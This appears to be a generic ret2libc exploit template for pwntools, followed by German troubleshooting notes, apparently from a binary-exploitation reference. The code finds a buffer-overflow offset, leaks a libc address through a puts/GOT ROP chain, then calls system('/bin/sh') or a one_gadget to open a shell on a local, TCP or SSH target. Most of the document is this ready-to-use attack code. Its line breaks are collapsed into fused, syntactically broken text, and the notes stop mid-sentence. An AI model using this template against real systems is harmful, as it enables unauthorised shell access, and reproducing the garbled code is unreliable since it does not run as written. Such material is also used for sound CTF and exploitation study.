from pwn import ELF, process, ROP, remote, ssh, gdb, cyclic, cyclic_find, log, p64, u64 # Import pwntools###################### CONNECTION #######################LOCAL =FalseREMOTETTCP =TrueREMOTESSH =FalseGDB =FalseUSE_ONE_GADGET =FalseLOCAL_BIN ="./vuln"REMOTE_BIN ="~/vuln"#For sshLIBC =""#ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know itENV ={"LD_PRELOAD": LIBC}if LIBC else{}if LOCAL:P =process(LOCAL_BIN, env=ENV)# start the vuln binaryELF_LOADED =ELF(LOCAL_BIN)# Extract data from binaryROP_LOADED =ROP(ELF_LOADED)# Find ROP gadgetselif REMOTETTCP:P =remote('10.10.10.10',1339)# start the vuln binaryELF_LOADED =ELF(LOCAL_BIN)# Extract data from binaryROP_LOADED =ROP(ELF_LOADED)# Find ROP gadgetselif REMOTESSH:ssh_shell =ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)p = ssh_shell.process(REMOTE_BIN)# start the vuln binaryelf =ELF(LOCAL_BIN)# Extract data from binaryrop =ROP(elf)# Find ROP gadgetsif GDB andnot REMOTETTCP andnot REMOTESSH:# attach gdb and continue# You can set breakpoints, for example "break *main"gdb.attach(P.pid, "b *main")############################# OFFSET FINDER ###############################OFFSET =b""#b"A"*264if OFFSET ==b"":gdb.attach(P.pid, "c")#Attach and continuepayload =cyclic(264)payload +=b"AAAAAAAA"print(P.clean())P.sendline(payload)#x/wx $rsp -- Search for bytes that crashed the application#print(cyclic_find(0x63616171)) # Find the offset of those bytesP.interactive()exit()####################### Find Gadgets #######################try:libc_func ="puts"PUTS_PLT = ELF_LOADED.plt['puts']#PUTS_PLT = ELF_LOADED.symbols["puts"] # This is also valid to call putsexcept:libc_func ="printf"PUTS_PLT = ELF_LOADED.plt['printf']MAIN_PLT = ELF_LOADED.symbols['main']POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0] #Same as ROPgadget --binary vuln | grep "pop rdi"RET = (ROP_LOADED.find_gadget(['ret']))[0]log.info("Main start: "+hex(MAIN_PLT))log.info("Puts plt: "+hex(PUTS_PLT))log.info("pop rdi; ret gadget: "+hex(POP_RDI))log.info("ret gadget: "+hex(RET))########################### Find LIBC offset ###########################defgenerate_payload_aligned(rop):payload1 = OFFSET + ropif (len(payload1)%16) ==0:return payload1else:payload2 = OFFSET +p64(RET)+ ropif (len(payload2)%16) ==0:log.info("Payload aligned successfully")return payload2else:log.warning(f"I couldn't align the payload! Len: {len(payload1)}")return payload1defget_addr(libc_func):FUNC_GOT = ELF_LOADED.got[libc_func]log.info(libc_func +" GOT @ "+hex(FUNC_GOT))# Create rop chainrop1 =p64(POP_RDI)+p64(FUNC_GOT)+p64(PUTS_PLT)+p64(MAIN_PLT)rop1 =generate_payload_aligned(rop1)# Send our rop-chain payload#P.sendlineafter("dah?", rop1) #Use this to send the payload when something is receivedprint(P.clean())# clean socket buffer (read all and print)P.sendline(rop1)# If binary is echoing back the payload, remove that messagerecieved = P.recvline().strip()if OFFSET[:30]in recieved:recieved = P.recvline().strip()# Parse leaked addresslog.info(f"Len rop1: {len(rop1)}")leak =u64(recieved.ljust(8, b"\x00"))log.info(f"Leaked LIBC address, {libc_func}: {hex(leak)}")# Set lib base addressif LIBC:LIBC.address = leak - LIBC.symbols[libc_func]#Save LIBC baseprint("If LIBC base doesn't end end 00, you might be using an icorrect libc library")log.info("LIBC base @ %s"%hex(LIBC.address))# If not LIBC yet, stop hereelse:print("TO CONTINUE) Find the LIBC library and continue with the exploit... (https://LIBC.blukat.me/)")P.interactive()returnhex(leak)get_addr(libc_func)#Search for puts address in memmory to obtain LIBC base################################# FINAL EXPLOITATION #################################### Via One_gadget (https://github.com/david942j/one_gadget)# gem install one_gadgetdefget_one_gadgets(libc):import string, subprocessargs = ["one_gadget","-r"]iflen(libc)==40andall(x in string.hexdigits for x in libc.hex()):args += ["-b", libc.hex()]else:args += [libc]try:one_gadgets = [int(offset)for offset in subprocess.check_output(args).decode('ascii').strip().split()]except:print("One_gadget isn't installed")one_gadgets = []returnrop2 =b""if USE_ONE_GADGET:one_gadgets =get_one_gadgets(LIBC)if one_gadgets:rop2 =p64(one_gadgets[0])+"\x00"*100#Usually this will fullfit the constrains## Normal/Long exploitationifnot rop2:BINSH =next(LIBC.search(b"/bin/sh"))#Verify with find /bin/shSYSTEM = LIBC.sym["system"]EXIT = LIBC.sym["exit"]log.info("POP_RDI %s "%hex(POP_RDI))log.info("bin/sh %s "%hex(BINSH))log.info("system %s "%hex(SYSTEM))log.info("exit %s "%hex(EXIT))rop2 =p64(POP_RDI)+p64(BINSH)+p64(SYSTEM)#p64(EXIT)rop2 =generate_payload_aligned(rop2)print(P.clean())P.sendline(rop2)P.interactive()#Interact with your shell :)
Häufige Probleme
MAIN_PLT = elf.symbols['main'] nicht gefunden
Wenn das "main"-Symbol nicht existiert (wahrscheinlich, weil es sich um eine gestrippte Binärdatei handelt). Dann kannst du einfach herausfinden, wo sich der Hauptcode befindet:
objdump -d vuln_binary | grep "\.text"Disassembly of section .text:0000000000401080<.text>:
und die Adresse manuell setzen:
MAIN_PLT =0x401080
Puts nicht gefunden
Wenn die Binary Puts nicht verwendet, sollten Sie überprüfen, ob sie verwendet wird
sh: 1: %s%s%s%s%s%s%s%s: nicht gefunden
Wenn Sie diesen Fehler nach der Erstellung aller Exploits finden: sh: 1: %s%s%s%s%s%s%s%s: nicht gefunden
Versuchen Sie, 64 Bytes von der Adresse von "/bin/sh" abzuziehen: